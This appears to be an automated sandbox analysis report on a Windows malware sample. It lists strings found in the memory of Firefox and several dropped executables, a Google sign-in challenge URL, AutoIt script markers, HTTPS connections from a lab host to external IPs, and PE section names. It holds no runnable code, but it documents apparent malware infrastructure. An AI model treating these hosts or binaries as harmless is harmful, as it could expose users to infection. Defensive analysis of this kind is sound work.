Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/privacy/subscription-services/
Source: efe6fe4127.exe, 0000000C.00000003.2849392911.00000000064E6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
Source: firefox.exe, 0000002E.00000003.3060467793.0000020F3AC5B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/legal/terms/mozilla/
Source: efe6fe4127.exe, 0000000C.00000003.2849392911.00000000064E6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
Source: efe6fe4127.exe, 0000000C.00000003.2849392911.00000000064E6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/android/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_c
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/ios/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_campa
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html#crash-reporter
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html#health-report
Source: firefox.exe, 0000001C.00000002.2932128135.00000121573CB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2932095953.0000029B41CC7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_c
Source: firefox.exe, 0000001C.00000002.2932128135.00000121573CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/US
Source: file.exe, 00000000.00000003.2193594882.00000000052D4000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2693716552.00000000056ED000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2693541904.00000000056EC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.2932128135.00000121573CB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2932095953.0000029B41CC7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_
Source: firefox.exe, 0000001C.00000002.2930946278.0000012157290000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://ac
Source: firefox.exe, 00000021.00000002.2936072675.0000029B41DE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://ac8
Source: firefox.exe, 0000002D.00000002.2975821570.0000014898280000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000002E.00000003.3056553256.0000020F30A15000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd
Source: firefox.exe, 00000018.00000002.2819634150.000001271015F000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2826679154.00000167E023B000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000002D.00000002.2975821570.000001489828B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd--no-default-browser
Source: firefox.exe, 0000001C.00000002.2931287187.00000121572A0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.2930946278.0000012157294000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2930456761.0000029B41A40000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2936072675.0000029B41DE4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdMOZ_CRASHREPORTER_RE
Source: unknown Network traffic detected: HTTP traffic on port 49949 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50139 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50053
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50056
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50055
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50057
Source: unknown Network traffic detected: HTTP traffic on port 50131 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50071 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49958 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50060
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50063
Source: unknown Network traffic detected: HTTP traffic on port 50068 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50102 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50045 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50125 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49978
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50106
Source: unknown Network traffic detected: HTTP traffic on port 50085 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50105
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50108
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50107
Source: unknown Network traffic detected: HTTP traffic on port 50060 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50065
Source: unknown Network traffic detected: HTTP traffic on port 49967 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50067
Source: unknown Network traffic detected: HTTP traffic on port 50113 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50056 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50066
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50069
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50102
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50068
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50101
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50103
Source: unknown Network traffic detected: HTTP traffic on port 50074 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50134 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50070
Source: unknown Network traffic detected: HTTP traffic on port 50107 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50053 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50072
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50071
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50074
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50073
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49978 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50080 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49967
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50117
Source: unknown Network traffic detected: HTTP traffic on port 50120 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50119
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50118
Source: unknown Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50009 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50015 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50076
Source: unknown Network traffic detected: HTTP traffic on port 49989 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50057 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50078
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50111
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50110
Source: unknown Network traffic detected: HTTP traffic on port 50114 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50113
Source: unknown Network traffic detected: HTTP traffic on port 50076 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50112
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50114
Source: unknown Network traffic detected: HTTP traffic on port 50108 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50081
Source: unknown Network traffic detected: HTTP traffic on port 50073 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50080
Source: unknown Network traffic detected: HTTP traffic on port 50028 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50082
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50085
Source: unknown Network traffic detected: HTTP traffic on port 50031 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50084
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49958
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown Network traffic detected: HTTP traffic on port 50037 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50006
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50119 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50009
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50008
Source: unknown Network traffic detected: HTTP traffic on port 50142 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50120
Source: unknown Network traffic detected: HTTP traffic on port 50020 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50093 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50089
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50000
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50121
Source: unknown Network traffic detected: HTTP traffic on port 50111 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50125
Source: unknown Network traffic detected: HTTP traffic on port 50051 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50048 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50136 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50093
Source: unknown Network traffic detected: HTTP traffic on port 50006 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49949
Source: unknown Network traffic detected: HTTP traffic on port 50082 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50065 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50105 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50139
Source: unknown Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50131
Source: unknown Network traffic detected: HTTP traffic on port 50055 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50011
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50132
Source: unknown Network traffic detected: HTTP traffic on port 50112 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50135
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50134
Source: unknown Network traffic detected: HTTP traffic on port 50078 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50015
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50136
Source: unknown Network traffic detected: HTTP traffic on port 50106 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49939 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50052 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50135 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50140
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49939
Source: unknown Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50081 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50029
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50028
Source: unknown Network traffic detected: HTTP traffic on port 50144 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50117 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50008 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50142
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50020
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50141
Source: unknown Network traffic detected: HTTP traffic on port 50070 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50144
Source: unknown Network traffic detected: HTTP traffic on port 50000 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50046 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50067 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50103 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50029 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50141 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50084 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50063 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50011 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50118 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50031
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50033
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50037
Source: unknown Network traffic detected: HTTP traffic on port 50050 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50110 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50066 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50140 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50089 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50121 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50033 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50045
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50046
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50048
Source: unknown Network traffic detected: HTTP traffic on port 50072 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50132 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50050
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50052
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50051
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49989
Source: unknown Network traffic detected: HTTP traffic on port 50069 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50101 -> 443
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49709 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49710 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49712 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49713 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49714 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49715 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49717 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49729 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49939 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49949 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49958 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49967 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49978 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49989 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50000 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50006 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50008 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50009 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50011 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50015 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50020 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50028 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50033 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50037 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50052 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.6:50055 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.6:50060 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50065 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50071 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50072 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50074 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50076 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50078 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50081 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50082 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50084 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50085 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50089 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50107 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.6:50108 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50111 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50119 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50120 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.6:50134 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50136 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50140 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50141 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50139 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.6:50142 version: TLS 1.2

System Summary

Source: deecb7b612.exe, 0000000D.00000002.2855360804.0000000000592000.00000002.00000001.01000000.00000010.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_49629fc6-c
Source: deecb7b612.exe, 0000000D.00000002.2855360804.0000000000592000.00000002.00000001.01000000.00000010.sdmp String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_8c565585-3
Source: deecb7b612.exe, 00000022.00000000.2920534582.0000000000592000.00000002.00000001.01000000.00000010.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_e38a3bd8-d
Source: deecb7b612.exe, 00000022.00000000.2920534582.0000000000592000.00000002.00000001.01000000.00000010.sdmp String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_ae61140d-7
Source: random[1].exe1.5.dr String found in binary or memory: This is a third-party compiled AutoIt script. memstr_e360881a-8
Source: random[1].exe1.5.dr String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_475376b7-e
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: YQEN9A9QU4P1VROBPV5YS.exe.0.dr Static PE information: section name:
Source: YQEN9A9QU4P1VROBPV5YS.exe.0.dr Static PE information: section name: .idata
Source: 99Q4Y3O9GBOXYTDVM9GPHI.exe.0.dr Static PE information: section name:
Source: 99Q4Y3O9GBOXYTDVM9GPHI.exe.0.dr Static PE information: section name: .idata
Source: 99Q4Y3O9GBOXYTDVM9GPHI.exe.0.dr Static PE information: section name:
Source: skotes.exe.4.dr Static PE information: section name:
Source: skotes.exe.4.dr Static PE information: section name: .idata
Source: skotes.exe.4.dr Static PE information: section name:
Source: random[1].exe.5.dr Static PE information: section name:
Source: random[1].exe.5.dr Static PE information: section name: .idata
Source: efe6fe4127.exe.5.dr Static PE information: section name:
Source: efe6fe4127.exe.5.dr Static PE information: section name: .idata
Source: random[1].exe0.5.dr Static PE information: section name:
Source: random[1].exe0.5.dr Static PE information: section name: .rsrc
Source: random[1].exe0.5.dr Static PE information: section name: .idata
Source: random[1].exe0.5.dr Static PE information: section name:
Source: b76bb5cee7.exe.5.dr Static PE information: section name:
Source: b76bb5cee7.exe.5.dr Static PE information: section name: .rsrc
Source: b76bb5cee7.exe.5.dr Static PE information: section name: .idata
Source: b76bb5cee7.exe.5.dr Static PE information: section name:
